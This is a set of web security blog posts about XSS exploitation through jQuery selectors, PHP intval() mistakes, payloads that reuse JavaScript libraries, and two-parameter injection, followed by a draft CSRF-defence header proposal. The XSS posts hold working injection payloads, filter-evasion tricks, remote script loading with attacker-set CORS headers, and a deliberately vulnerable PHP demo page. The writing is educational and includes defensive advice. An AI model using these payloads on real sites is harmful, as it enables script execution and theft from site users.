Browsers are becoming more secure, but they need a site’s cooperation to protect personal information. At the very least, sites should be using HTTPS to protect traffic as it flows from browser to server. To do so is laudable yet insufficient for protecting data. And even this positive step moves slowly. Privacy on mobile devices moves perhaps even more slowly. The recent iOS 7 finally forbids apps from accessing a device’s unique identifier, while Android struggles to offer comprehensive tools.

The browser is Home. Apps are Home. These are places where processing takes on new connotations. This is where our data becomes their food.

Soylent Green’s year 2022 approaches. Humanity must know.

Selector the Almighty, Subjugator of Elements

Initial D: The Fool with Two Demons

An ancient demon of web security skulks amongst all developers. It will live as long as there are people writing software. It is a subtle beast called by many names in many languages. But I call it Inicere, the Concatenator of Strings.

The demon’s sweet whispers of simplicity convince developers to commingle data with code — a mixture that produces insecure apps. Where its words promise effortless programming, its advice leads to flaws like SQL injection and cross-site scripting (aka HTML injection).

We have understood the danger of HTML injection ever since browsers rendered the first web sites decades ago. Developers naively take user-supplied data and write it into form fields, eliciting howls of delight from attackers who enjoyed demonstrating how to transform <input value="abc"> into <input value="abc"><script>alert(9)</script><"">.

In response to this threat, heedful developers turned to the Litany of Output Transformation, which involved steps like applying HTML encoding and percent encoding to data being written to a web page. Thus, injection attacks become innocuous strings because the litany turns characters like angle brackets and quotation marks into representations like %3C and &quot; that have a different semantic identity within HTML.

But developers wanted to do more with their web sites. They wanted more complex JavaScript. They wanted the desktop in the browser. And as a consequence they’ve conjured new demons to corrupt our web apps. I have seen one such demon. And named it. For names have power.

Demons are vain. This one no less so than its predecessors. I continue to find it among JavaScript and jQuery. Its name is Selector the Almighty, Subjugator of Elements.

Here is a link that does not yet reveal the creature’s presence:


Yet in the response to this link, the word “search” has been reflected in a .ready() function block. It’s a common term, and the appearance could easily be a coincidence. But if we experiment with several source values, we confirm that the web app writes the parameter into the page.

$(document).ready(function() {
    $("#page-hdr h3").css("width","385px");

A first step in crafting an exploit is to break out of a quoted string. A few probes indicate the site does not enforce any restrictions on the source parameter, possibly because the developers assumed it would not be tampered with — the value is always hard-coded among links within the site’s HTML.

After a few more experiments we come up with a viable exploit.


We’ve followed all the good practices for creating a JavaScript exploit. It terminates all strings and scope blocks properly, and it leaves the remainder of the JavaScript with valid syntax. Thus, the page carries on as if nothing special has occurred.

$(document).ready(function() {
    $("#page-hdr h3").css("width","385px");
    $("#main-panel").addClass("");});alert(9);(function(){$("#main-panel").addClass("search-wdth938"); });

There’s nothing particularly special about the injection technique for this vuln. It’s a trivial, too-common case of string concatenation. But we were talking about demons. And once you’ve invoked one by it’s true name it must be appeased. It’s the right thing to do; demons have feelings, too.

Therefore, let’s focus on the exploit this time, instead of the vuln. The site’s developers have already laid out the implements for summoning an injection demon, why don’t we force Selector to do our bidding?

Web hackers should be familiar with jQuery (and its primary DOM manipulation feature, the Selector) for several reasons. Its misuse can be a source of vulns, especially so-called “DOM-based XSS” that delivers HTML injection attacks via DOM properties. JQuery is a powerful, flexible library that provides capabilities you might need for an exploit. And its syntax can be leveraged to bypass weak filters looking for more common payloads that contain things like inline event handlers or explicit <script> tags.

In the previous examples, the exploit terminated the jQuery functions and inserted an alert pop-up. We can do better than that.

The jQuery Selector is more powerful than the CSS selector syntax. For one thing, it may create an element. The following example creates an <img> tag whose onerror handler executes yet more JavaScript. (We’ve already executed arbitrary JavaScript to conduct the exploit, this emphasizes the Selector’s power. It’s like a nested injection attack.):

$("<img src='x' onerror=alert(9)>")

Or, we could create an element, then bind an event to it, as follows:

$("<img src='x'>").on("error",function(){alert(9)});

We have all the power of JavaScript at our disposal to obfuscate the payload. For example, we might avoid literal < and > characters by taking them from strings within the page. The following example uses string indexes to extract the angle brackets from two different locations in order to build an <img> tag. (The indexes may differ depending on the page’s HTML; the technique is sound.)


As an aside, there are many ways to build strings from JavaScript objects. It’s good to know these tricks because sometimes filters don’t outright block characters like < and >, but block them only in combination with other characters. Hence, you could put string concatenation to use along with the source property of a RegExp (regular expression) object. Even better, use the slash representation of RegExp, as follows:

/</.source + "img" + />/.source

Or just ask Selector to give us the first <img> that’s already on the page, change its src attribute, and bind an onerror event. In the next example we used the Selector to obtain a collection of elements, then iterated through the collection with the .each() function. Since we specified a :first selector, the collection should only have one entry.

$(":first img").each(function(k,o){o.src="x";o.onerror=alert(9)})

Maybe you wish to booby-trap the page with a function that executes when the user decides to leave. The following example uses a Selector on the Window object:


We have Selector at our mercy. As I’ve mentioned in other articles, make the page do the work of loading more JavaScript. The following example loads JavaScript from another origin. Remember to set Access-Control-Allow-Origin headers on the site you retrieve the script from. Otherwise, a modern browser will block the cross-origin request due to CORS security.


I’ll save additional tricks for the future. For now, read through jQuery’s API documentation. Pay close attention to:

  • Selectors, and how to name them.
  • Events, and how to bind them.
  • DOM nodes, and how to manipulate them.
  • Ajax functions, and how to call them.

Selector claims the title of Almighty, but like all demons its vanity belies its weakness. As developers, we harness its power whenever we use jQuery. Yet it yearns to be free of restraint, awaiting the laziness and mistakes that summon Inicere, the Concatenator of Strings, that in turn releases Selector from the confines of its web app.

Oh, what’s that? You came here for instructions to exorcise the demons from your web app? You should already know the Rite of Filtration by heart, and be able to recite from memory lessons from the Codex of Encoding. We’ll review them in a moment. First, I have a ritual of my own to finish. What were those words? Klaatu, bard and a…um…nacho.

p.s. It’s easy to reproduce the vulnerable HTML covered in this article. But remember, this was about leveraging jQuery to craft exploits. If you have a PHP installation handy, use the following code to play around with these ideas. You’ll need to download a local version of jQuery or point to a CDN. Just load the page in a browser, open the browser’s development console, and hack away!

<?php $s = isset($_REQUEST['s']) ? $_REQUEST['s'] : 'defaultWidth'; ?>
<!doctype html>
<head><meta charset="utf-8">
<!-- /\* jQuery Selector Injection Demo \*/ -->
<script src=""></script>
<script> $(document).ready(function(){ $("#main-panel").addClass("<?php print $s;?>"); }) </script>
  <div id="main-panel"> <a href="#" id="link1" class="foo">a link</a> <br>
    <input type="hidden" id="csrf" name="_csrfToken" value="123">
    <input type="text" name="q" value=""><br> <input type="submit" value="Search">
  <img id="footer" src="" alt="">

A Default Base of XSS

Modern PHP has successfully shed many of the problematic functions and features that contributed to the poor security reputation the language earned in its early days. Settings like safe_mode mislead developers about what was really being made “safe” and magic_quotes caused unending headaches. And naive developers caused more security problems because they knew just enough to throw some code together, but not enough to understand the implications of blindly trusting data from the browser.

In some cases, the language tried to help developers – prepared statements are an excellent counter to SQL injection attacks. The catch is that developers actually have to use them. In other cases, the language’s quirks weakened code. For example, register_globals allowed attackers to define uninitialized values (among other things); and settings like magic_quotes might be enabled or disabled by a server setting, which made deployment unpredictable.


But the language alone isn’t to blame. Developers make mistakes, both subtle and simple. These mistakes inevitably lead to vulns like our ever-favorite HTML injection.

Consider the intval() function. It’s a typical PHP function in the sense that it has one argument that accepts mixed types and a second argument with a default value. (The base is used in the numeric conversion from string to integer):

int intval ( mixed $var , int $base = 10 )

The function returns the integer representation of $var (or “casts it to an int” in more type-safe programming parlance). If $var cannot be cast to an integer, then the function returns 0. (Just for fun, if $var is an object type, then the function returns 1.)

Using intval() is a great way to get a “safe” number from a request parameter. Safe in the sense that the value should either be 0 or an integer representable by the platform running. Pesky characters like apostrophes or angle brackets that show up in injection attacks will disappear – at least, they should.

The problem is that you must be careful if you commingle usage of the newly cast integer value with the raw $var that went into the function. Otherwise, you may end up with an HTML injection vuln – and some moments of confusion in finding the problem in the first place.

The following code is a trivial example condensed from a web page in the wild:

<?php $s = isset($_GET['s']) ? $_GET['s'] : '';
$n = intval($s);
$val = $n > 0 ? $s : '';
<!doctype html>
<meta charset="utf-8">
<input type="text" name="s" value="<?php print $val;?>"><br>
<input type="submit">

At first glance, a developer might assume this to be safe from HTML injection. Especially if they test the code with a simple payload:"><script>alert(9)<script>

As a consequence of the non-numeric payload, the intval() has nothing to cast to an integer, so the greater than zero check fails and the code path sets $val to an empty string. Such security is short-lived. Try the following link:"><script>alert(9)<script>

With the new payload, intval() returns 19 and the original parameter gets written into the page. The programming mistake is clear: don’t rely on intval() to act as your validation filter and then fall back to using the original parameter value.

Since we’re on the subject of PHP, we’ll take a moment to explore some nuances of its parameter handling. The following behaviors have no direct bearing on the HTML injection example, but you should be aware of them since they could come in handy for different situations.

One idiosyncrasy of PHP is the relation of URL parameters to superglobals and arrays. Superglobals are request variables like $_GET, $_POST, and $_REQUEST that contain arrays of parameters. Arrays are actually containers of key/value pairs whose keys or values may be extracted independently (they are implemented as an ordered map).

It’s the array type that leads to surprising results for developers. Surprise is an undesirable event in secure software. With this in mind, let’s return to the example. The following link has turned the s parameter into an array:[]=19

The sample code will print Array in the form field because intval() returns 1 for a non-empty array.

We could define the array with several tricks, such as an indexed array (i.e. integer indices):[0]=19&s[1]=42[0][0]=19

Note that we can’t pull off any clever memory-hogging attacks using large indices. PHP won’t allocate space for missing elements since the underlying container is really a map.[0]=19&s[4294967295]=42

This also implies that we can create negative indices:[-1]=19

Or we can create an array with named keys:["a"]=19["<script>"]=19

For the moment, we’ll leave the “parameter array” examples as trivia about the PHP language. However, just as it’s good to understand how a function like intval() handles mixed-type input to produce an integer output; it’s good to understand how a parameter can be promoted from a single value to an array.

The intval() example is specific to PHP, but the issue represents broader concepts around input validation that apply to programming in general:

First, when passing any data through a filter or conversion, make sure to consistently use the “new” form of the data and throw away the “raw” input. If you find your code switching between the two, reconsider why it apparently needs to do so.

Second, make sure a security filter inspects the entirety of a value. This covers things like making sure validation regexes are anchored to the beginning and end of input, or being strict with string comparisons.

Third, decide on a consistent policy for dealing with invalid data. The intval() is convenient for converting to integers; it makes it easy to take strings like “19”, “19abc”, or “abc” and turn them into 19, 19, or 0. But you may wish to treat data that contains non-numeric characters with more suspicion. Plus, “fixing up” data like “19abc” into 19 is hazardous when applied to strings. The simplest example is stripping a word like “script” to defeat HTML injection attacks – it misses a payload like “<scrscriptipt>”.

DRY Fiend (Conjuration/Summoning)

Thief PHB

In 1st edition AD&D two character classes had their own private languages: Druids and Thieves. Thus, a character could use the “Thieves’ Cant” to identify peers, bargain, threaten, or otherwise discuss malevolent matters with a degree of safety. (Of course, Magic-Users had that troublesome first level spell comprehend languages, and Assassins of 9th level or higher could learn secret or alignment languages forbidden to others.)

Thieves rely on subterfuge (and high DEX) to avoid unpleasant ends. Shakespeare didn’t make it into the list of inspirational reading in Appendix N of the DMG. Even so, consider in Henry VI, Part II, how the Duke of Gloucester (later to be Richard III) defends his treatment of certain subjects, with two notable exceptions:

Unless it were a bloody murderer,

Or foul felonious thief that fleec’d poor passengers,

I never gave them condign punishment.

Developers have their own spoken language for discussing code and coding styles. They litter conversations with terms of art like patterns and anti-patterns, which serve as shorthand for design concepts or litanies of caution. One such pattern is Don’t Repeat Yourself (DRY), of which Code Reuse is a lesser manifestation.

Well, hackers code, too.

The most boring of HTML injection examples is to display an alert() message. The second most boring is to insert the document.cookie value into a request. But this is the era of HTML5 and roses; hackers need look no further than a vulnerable Same Origin to find useful JavaScript libraries and functions.

There are two important reasons for taking advantage of DRY in a web hack:

  1. Avoid incompetent deny lists (which is really a redundant term).
  2. Leverage code that already exists.

Keep in mind that none of the following hacks are flaws of each respective JavaScript library. The target is assumed to have an HTML injection vulnerability – our goal is to take advantage of code already present on the hacked site in order to minimize our effort.

For example, imagine an HTML injection vulnerability in a site that uses the AngularJS library. The attacker could use a payload like:

angular.bind(self, alert, 9)()

In Ember.js the payload might look like:, alert, 9)

The pervasive jQuery might have a string like:


And the Underscore library might be leveraged with:

_.defer(alert, 9)

These are nice tricks. They might seem to do little more than offer fancy ways of triggering an alert() message, but the code is trivially modifiable to a more lethal version worthy of a vorpal blade.

More importantly, these libraries provide the means to load – and execute! – JavaScript from a different origin. After all, browsers don’t really know the difference between a CDN and a malicious domain.

The jQuery library provides a few ways to obtain code:

$.get('//') $('#selector').load('//')

Prototype has an Ajax object. It will load and execute code from a call like:

new Ajax.Request('//')

But this has a catch: the request includes “non-simple” headers via the XHR object and therefore triggers a CORS pre-flight check in modern browsers. An invalid pre-flight response will cause the attack to fail. Cross-Origin Resource Sharing is never a problem when you’re the one sharing the resource.

In the Prototype Ajax example, a browser’s pre-flight might look like the following. The initiating request comes from a link we’ll call

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:23.0) Gecko/20100101 Firefox/23.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8
Accept-Language: en-US,en;q=0.5
Access-Control-Request-Method: POST
Access-Control-Request-Headers: x-prototype-version,x-requested-with
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
Content-length: 0

As someone with influence over the content served by, it’s easy to let the browser know that this incoming cross-origin XHR request is perfectly fine. Hence, we craft some code to respond with the appropriate headers:

HTTP/1.1 200 OK Date: Tue, 27 Aug 2013 05:05:08 GMT
Server: Apache/2.2.24 (Unix) mod_ssl/2.2.24 OpenSSL/1.0.1e DAV/2 SVN/1.7.10 PHP/5.3.26
Access-Control-Allow-Methods: GET, POST
Access-Control-Allow-Headers: x-json,x-prototype-version,x-requested-with
Access-Control-Expose-Headers: x-json
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8

With that out of the way, the browser continues its merry way to the cursed resource. We’ve done nothing to change the default behavior of the Ajax object, so it produces a POST. (Changing the method to GET would not have avoided the CORS pre-flight because the request would have still included custom X- headers.)

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:23.0) Gecko/20100101 Firefox/23.0
Accept: text/javascript, text/html, application/xml, text/xml, \*/\*
Accept-Language: en-US,en;q=0.5
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.7.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 0
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

Finally, our site responds with CORS headers intact and a payload to be executed. We’ll be even lazier and tell the browser to cache the CORS response so it’ll skip subsequent pre-flights for a while.

HTTP/1.1 200 OK Date: Tue, 27 Aug 2013 05:05:08 GMT
Server: Apache/2.2.24 (Unix) mod_ssl/2.2.24 OpenSSL/1.0.1e DAV/2 SVN/1.7.10 PHP/5.3.26
X-Powered-By: PHP/5.3.26
Access-Control-Allow-Methods: GET, POST
Access-Control-Allow-Headers: x-json,x-prototype-version,x-requested-with
Access-Control-Expose-Headers: x-json
Access-Control-Max-Age: 86400
Content-Length: 10
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: application/javascript; charset=utf-8


Okay. So, it’s another alert() message. I suppose I’ve repeated myself enough on that topic for now.

Find/Remove Traps

It should be noted that Content Security Policy just might help you in this situation. The catch is that you need to have architected your site to remove all inline JavaScript. That’s not always an easy feat. Even experienced developers of major libraries like jQuery are struggling to create CSP-compatible content. Never the less, auditing and improving code for CSP is a worthwhile endeavor. Even 1st level thieves only have a 20% change to Find/Remove Traps. The chance doesn’t hit 50% until 7th level. Improvement takes time.

And the price for failure? Well, it turns out condign punishment has its own API.

...And They Have a Plan

No notes are so disjointed as the ones skulking about my brain as I was preparing slides for last week’s BlackHat presentation. I’ve now wrangled them into a mostly coherent write-up.

This won’t be the last post on this topic. I’ll be doing two things over the next few weeks: throwing a doc into github to track changes/recommendations/etc., responding to more questions, working on a different presentation, and trying to stick to the original plan (i.e. two things). Oh, and getting better at MarkDown.

So, turn up some Jimi Hendrix, play some BSG in the background, and read on.

== The Problem ==

Cross-Site Request Forgery (CSRF) abuses the normal ability of browsers to make cross-origin requests by crafting a resource on one origin that causes a victim’s browser to make a request to another origin using the victim’s security context associated with that target origin.

The attacker creates and places a malicious resource on an origin unrelated to the target origin to which the victim’s browser will make a request. The malicious resource contains content that causes a browser to make a request to the unrelated target origin. That request contains parameters selected by the attacker to affect the victim’s security context with regard to the target origin.

The attacker does not need to violate the browser’s Same Origin Policy to generate the cross origin request. Nor does the attack require reading the response from the target origin. The victim’s browser automatically includes cookies associated with the target origin for which the forged request is being made. Thus, the attacker creates an action, the browser requests the action and the target web application performs the action under the context of the cookies it receives – the victim’s security context. An effective CSRF attack means the request modifies the victim’s context with regard to the web application in a way that’s favorable to the attacker. For example, a CSRF attack may change the victim’s password for the web application.

CSRF takes advantage of web applications that fail to enforce strong authorization of actions during a user’s session. The attack relies on the normal, expected behavior of web browsers to make cross-origin requests from resources they load on unrelated origins.

The browser’s Same Origin Policy prevents a resource in one origin to read the response from an unrelated origin. However, the attack only depends on the forged request being submitted to the target web app under the victim’s security context – it does not depend on receiving or seeing the target app’s response.

== The Proposed Solution ==

SOS is proposed an additional policy type of the Content Security Policy. Its behavior also includes pre-flight behavior as used by the Cross Origin Resource Sharing spec.

SOS isn’t just intended as a catchy an acronym. The name is intended to evoke the SOS of Morse code, which is both easy to transmit and easy to understand. If it is required to explain what SOS stands for, then “Session Origin Security” would be preferred. (However, “Simple Origin Security”, “Some Other Security”, and even “Save Our Site” are acceptable. “Same Old Stuff” is discouraged. More options are left to the reader.)

An SOS policy may be applied to one or more cookies for a web application on a per-cookie or collective basis. The policy controls whether the browser includes those cookies during cross-origin requests. (A cross-origin resource cannot access a cookie from another origin, but it may generate a request that causes the cookie to be included.)

== Format ==

A web application sets a policy by including a Content-Security-Policy response header. This header may accompany the response that includes the Set-Cookie header for the cookie to be covered, or it may be set on a separate resource.

A policy for a single cookie would be set as follows, with the cookieName of the cookie and a directive of 'any', 'self', or 'isolate'. (Those directives will be defined shortly.)

Content-Security-Policy: sos-apply=_cookieName_ '_policy_'

A response may include multiple CSP headers, such as:

Content-Security-Policy: sos-apply=_cookieOne_ '_policy_'
Content-Security-Policy: sos-apply=_cookieTwo_ '_policy_'

A policy may be applied to all cookies by using a wildcard:

Content-Security-Policy: sos-apply=* '_policy_'

== Policies ==

One of three directives may be assigned to a policy. The directives affect the browser’s default handling of cookies for cross-origin requests to a cookie’s destination origin. The pre-flight concept will be described in the next section; it provides a mechanism for making exceptions to a policy on a per-resource basis.

Policies are only invoked for cross-origin requests. Same origin requests are unaffected.

'any' – include the cookie. This represents how browsers currently work. Make a pre-flight request to the resource on the destination origin to check for an exception response.

'self' – do not include the cookie. Make a pre-flight request to the resource on the destination origin to check for an exception response.

'isolate' – never include the cookie. Do not make a pre-flight request to the resource because no exceptions are allowed.

== Pre-Flight ==

A browser that is going to make a cross-origin request that includes a cookie covered by a policy of 'any' or 'self' must make a pre-flight check to the destination resource before conducting the request. (A policy of 'isolate' instructs the browser to never include the cookie during a cross-origin request.)

The purpose of a pre-flight request is to allow the destination origin to modify a policy on a per-resource basis. Thus, certain resources of a web app may allow or deny cookies from cross-origin requests despite the default policy.

The pre-flight request works identically to that for Cross Origin Resource Sharing, with the addition of an Access-Control-SOS header. This header includes a space-delimited list of cookies that the browser might otherwise include for a cross-origin request, as follows:

Access-Control-SOS: cookieOne CookieTwo

A pre-flight request might look like the following, note that the Origin header is expected to be present as well:

Origin: https://other.origin
Access-Control-SOS: sid
Connection: keep-alive
Content-Length: 0

The destination origin may respond with an Access-Control-SOS-Reply header that instructs the browser whether to include the cookie(s). The response will either be 'allow' or 'deny'.

The response header may also include an expiration in seconds. The expiration allows the browser to remember this response and forego subsequent pre-flight checks for the duration of the value.

The following example would allow the browser to include a cookie with a cross-origin request to the destination origin even if the cookie’s policy had been 'self’. (In the absence of a reply header, the browser would not include the cookie.)

Access-Control-SOS-Reply: 'allow' expires=600

The following example would deny the browser to include a cookie with a cross-origin request to the destination origin even if the cookie’s policy had been 'any'. (In the absence of a reply header, the browser would include the cookie.)

Access-Control-SOS-Reply: 'deny' expires=0

The browser would be expected to track policies and policy exceptions based on destination origins. It would not be expected to track pairs of origins (e.g. different cross-origins to the destination) since such a mapping could easily become cumbersome, inefficient, and more prone to abuse or mistakes.

As described in this section, the pre-flight is an all-or-nothing affair. If multiple cookies are listed in the Access-Control-SOS header, then the response applies to all of them. This might not provide enough flexibility. On the other hand, simplicity tends to encourage security.

== Benefits ==

Note that a policy can be applied on a per-cookie basis. If a policy-covered cookie is disallowed, any non-covered cookies for the destination origin may still be included. Think of a non-covered cookie as an unadorned or “naked” cookie – their behavior and that of the browser matches the web of today.

The intention of a policy is to control cookies associated with a user’s security context for the destination origin. For example, it would be a good idea to apply 'self' to a cookie used for authorization (and identification, depending on how tightly coupled those concepts are by the app’s reliance on the cookie).

Imagine a Wordpress installation hosted at The site’s owner wishes to allow anyone to visit, especially when linked-in from search engines, social media, and other sites of different origins. In this case, they may define a policy of 'any' set by the landing page:

Content-Security-Policy: sos-apply=sid 'any'

However, the /wp-admin/ directory represents sensitive functions that should only be accessed by intention of the user. Wordpress provides a robust nonce-based anti-CSRF token. Unfortunately, many plugins forget to include these nonces and therefore become vulnerable to attack. Since the site owner has set a policy for the sid cookie (which represents the session ID), they could respond to any pre-flight request to the /wp-admin/ directory as follows:

Access-Control-SOS-Reply: 'deny' expires=86400

Thus, the /wp-admin/ directory would be protected from CSRF exploits because a browser would not include the sid cookie with a forged request.

The use case for the 'isolate' policy is straight-forward: the site does not expect any cross-origin requests to include cookies related to authentication or authorization. A bank or web-based email might desire this behavior. The intention of isolate is to avoid the requirement for a pre-flight request and to forbid exceptions to the policy.

== Notes ==

This is a draft. The following thoughts represent some areas that require more consideration or that convey some of the motivations behind this proposal.

This is intended to affect cross-origin requests made by a browser.

It is not intended to counter same-origin attacks such as HTML injection (XSS) or intermediation attacks such as sniffing. Attempting to solve multiple problems with this policy leads to folly.

CSRF evokes two sense of the word “forgery”: creation and counterfeiting. This approach doesn’t inhibit the creation of cross-origin requests (although something like “non-simple” XHR requests and CORS would). Nor does it inhibit the counterfeiting of requests, such as making it difficult for an attacker to guess values. It defeats CSRF by blocking a cookie that represents the user’s security context from being included in a cross-origin request the user likely didn’t intend to make.

There may be a reason to remove a policy from a cookie, in which case a CSP header could use something like an sos-remove instruction:

Content-Security-Policy: sos-remove=cookieName

Cryptographic constructs are avoided on purpose. Even if designed well, they are prone to implementation error. They must also be tracked and verified by the app, which exposes more chances for error and induces more overhead. Relying on nonces increases the difficulty of forging (as in counterfeiting) requests, whereas this proposed policy defines a clear binary of inclusion/exclusion for a cookie. A cookie will or will not be included vs. a nonce might or might not be predicted.

PRNG values are avoided on purpose, for the same reasons as cryptographic nonces. It’s worth noting that misunderstanding the difference between a random value and a cryptographically secure PRNG (which a CSRF token should favor) is another point against a PRNG-based control.

A CSP header was chosen in favor of decorating the cookie with new attributes because cookies are already ugly, clunky, and (somewhat) broken enough. Plus, the underlying goal is to protect a session or security context associated with a user. As such, there might be reason to extended this concept to the instantiation of Web Storage objects, e.g. forbid them in mixed-origin resources. However, this hasn’t really been thought through and probably adds more complexity without solving an actual problem.

The pre-flight request/response shouldn’t be a source of information leakage about cookies used by the app. At least, it shouldn’t provide more information than might be trivially obtained through other techniques.

It’s not clear what an ideal design pattern would be for deploying SOS headers. A policy could accompany each Set-Cookie header. Or the site could use a redirect or similar bottleneck to set policies from a single resource.

It would be much easier to retrofit these headers on a legacy app by using a Web App Firewall than it would be trying to modify code to include nonces everywhere.

It would be (possibly) easier to audit a site’s protection based on implementing the headers via mod_rewrite tricks or WAF rules that apply to whole groups of resources than it would for a code audit of each form and action.

The language here tilts (too much) towards formality, but the terms and usage haven’t been vetted yet to adhere to those in HTML, CSP and CORS. The goal right now is clarity of explanation; pedantry can wait.

== Cautions ==

In addition to the previous notes, these are highlighted as particular concerns.

Conflicting policies would cause confusion. For example, two different resources separately define an 'any' and 'self' for the same cookie. It would be necessary to determine which receives priority.

Cookies have the unfortunate property that they can belong to multiple origins (i.e. sub-domains). Hence, some apps might incur additional overhead of pre-flight requests or complexity in trying to distinguish cross-origin of unrelated domains and cross-origin of sub-domains.

Apps that rely on “Return To” URL parameters might not be fixed if the return URL has the CSRF exploit and the browser is now redirecting from the same origin. Maybe. This needs some investigation.

There’s no migration for old browsers: You’re secure (using a supporting browser and an adopted site) or you’re not. On the other hand, an old browser is an insecure browser anyway – browser exploits are more threatening than CSRF for many, many cases.

There’s something else I forgot to mention that I’m sure I’ll remember tomorrow.

I’ll leave you with this quote from the last episode of BSG. Thanks for reading!

Six: All of this has happened before.

Baltar: But the question remains, does all of this have to happen again?

The Resurrected Skull

It’s been seven hours and fifteen days.

No. Wait. It’s been seven years and much more than fifteen days.

But nothing compares to the relief of finishing the 4th edition of The Anti-Hacker Toolkit. The book with the skull on its cover. A few final edits need to be wrangled, but they’re minor compared to the major rewrite this project entailed.

AHT 1st Edition

The final word count comes in around 200,000. That’s slightly over twice the length of Hacking Web Apps. (Or roughly 13,000 Tweets or 200 blog posts.) Those numbers are just trivia associated with the mechanics of writing. The reward of writing is the creative process and the (eventual…) final product.

In retrospect (and through the magnfying lens of self-criticism), some of the writing in the previous edition was awful. Some of it was just inconsistent with terminology and notation. Some of it was unduly sprinkled with empty phrases or sentences that should have been more concise. Fortunately, it apparently avoided terrible cliches (all cliches are terrible, I just wanted to emphasize my distaste for them).

Many tools have been excised; others have been added. A few pleaded to remain despite their questionable relevance (I’m looking at you, wardialers). But such content was trimmed to make way for the modern era of computers without modems or floppy drives.

The previous edition had a few quaint remarks, such as a reminder to save files to a floppy disk, references to COM ports, and astonishment at file sizes that weighed in at a few dozen megabytes. The word zombie appeared three times, although none of the instances were as threatening as the one that appeared in my last book.

Over the next few weeks I’ll post more about this new edition and introduce you to its supporting web site. This will give you a flavor for what the book contains better than any book-jacket marketing dazzle.

In spite of the time dedicated to the book, I’ve added 17 new posts this year. Five of them have broken into the most-read posts since January. So, while I take some down time from writing, check out the archives for items you may have missed.

And if you enjoy reading content here, please share it! Twitter has proven to be the best mechanism for gathering eyeballs. Also, consider pre-ordering the new 4th edition or checking out my current book on web security. In any case, thanks for stopping by.

Meanwhile, I’ll be relaxing to music. I’ve put Sinéad O’Connor in the queue; it’s a beautiful piece. (And a cover of a Prince song, which reminds me to put some Purple Rain in the queue, too). Then it’s on to a long set of Sisters of Mercy, Wumpscut, Skinny Puppy, and anything else that makes it feel like every day is Halloween.

Two Hearts That Beat As One

A common theme among injection attacks that manifest within a JavaScript context (e.g. <script> tags) is that proper payloads preserve proper syntax. We’ve belabored the point of this dark art with such dolorous repetition that even Professor Umbridge might approve.

We’ve covered the most basic of HTML injection exploits, exploits that need some tweaking to bypass weak filters, and different ways of constructing payloads to preserve their surrounding syntax. The typical process is choose a parameter (or a cookie!), find if and where its value shows up in a page, hack the page. It’s a single-minded purpose against a single injection vector.

Until now.

It’s possible to maintain this single-minded purpose, but to do so while focusing on two variables. This is an elusive beast of HTML injection in which an app reflects more than one parameter within the same page. It gives us more flexibility in the payloads, which sometimes helps evade certain kinds of patterns used in input filters or web app firewall rules.

This example targets two URL parameters used as arguments to a function that expects the start and end of a time period. Forget time, we’d like to start an attack and end with its success.

Here’s a version of the link with numeric arguments:

The app uses these values inside a <script> block, as follows:

<script> var start = 1, end = 2;

$(JM.Scheduler.TimeZone.init(start, end)); foo.init(); </script>

The “normal” attack is simple:;//&end=2

This results in a successful alert(), but the app has some sort of silly check that strips the end value if it’s not greater than the start. Thus, you can’t have start=2&end=1. And the comparison always fails if you use a string for start, because end will never be greater than whatever the string is cast to (likely zero). At least the devs remembered to enforce numeric consistency in spite of security deficiency.

<script> var start = alert(9);//, end = ;

$(JM.Scheduler.TimeZone.init(start, end)); foo.init(); </script>

But that’s inelegant compared with the attention to detail we’ve been advocating for exploit creation. The app won’t assign a value to end, thereby leaving us with a syntax error. To compound the issue, the developers have messed up their own code, leaving the browser to complain:

ReferenceError: Can't find variable: $

Let’s see what we can do to help. For starters, we’ll just assign start to end (internally, the app has likely compared a string-cast-to-number with another string-cast-to-number, both of which fail identically, which lets the payload through). Then, we’ll resolve the undefined variable for them – but only because we want a clean error console upon delivering the attack.;//&end=start;$=null

<script> var start = alert(9);//, end = start;$=null;

$(JM.Scheduler.TimeZone.init(start, end)); foo.init(); </script>

What’s interesting about “two factor” vulns like this is the potential for using them to bypass validation filters.["ale"/*&end=*/%2b"rt"](9)

<script> var start = window["ale"/* end = */+"rt"](9);

$(JM.Scheduler.TimeZone.init(start, end)); foo.init(); </script>

Rather than think about different ways to pop an alert() in someone’s browser, think about what could be possible if jQuery was already loaded in the page. Thanks to JavaScript’s design, it doesn’t even hurt to pass extra arguments to a function:$["getSc"%2b"ript"](""&end=undefined)

<script> var start = $["getSc"+"ript"]("", end = undefined);

$(JM.Scheduler.TimeZone.init(start, end)); foo.init(); </script>

And if it’s necessary to further obfuscate the payload we might try this:$[start]%28%22//

<script> var start = "getSc"+"ript", end = $[start]("//");

$(JM.Scheduler.TimeZone.init(start, end)); foo.init(); </script>

Maybe combining two parameters into one attack reminds you of the theme of two hearts from 80s music. Possibly U2’s War from 1983. I never said I wasn’t gonna tell nobody about a hack like this, just like that Stacey Q song a few years later – two of hearts, two hearts that beat as one. Or Phil Collins’ Two Hearts three years after that.

Although, if you forced me to choose between two hearts that beat as one, I’d choose a Timelord, of course. In particular, someone that preceded all that music: Tom Baker. Jelly Baby, anyone?

Tom Baker

A True XSS That Needs To Be False


It is on occasion necessary to persuade a developer that an HTML injection vuln capitulates to exploitation notwithstanding the presence within of a redirect that conducts the browser away from the exploit’s embodied alert(). Sometimes, parsing an expression takes more effort that breaking it.

So, redirect your attention from defeat to the few minutes of creativity required to adjust an unproven injection into a working one. Here’s the URL we start with:"onmouseover=alert(9);a="

The page reflects the value of this id parameter within an href attribute. There’s nothing remarkable about this payload or how it appears in the page. At least, not at first:

<a href="mailto:[email protected]?subject=error ref: "onmouseover=alert(9);a="">
[email protected]

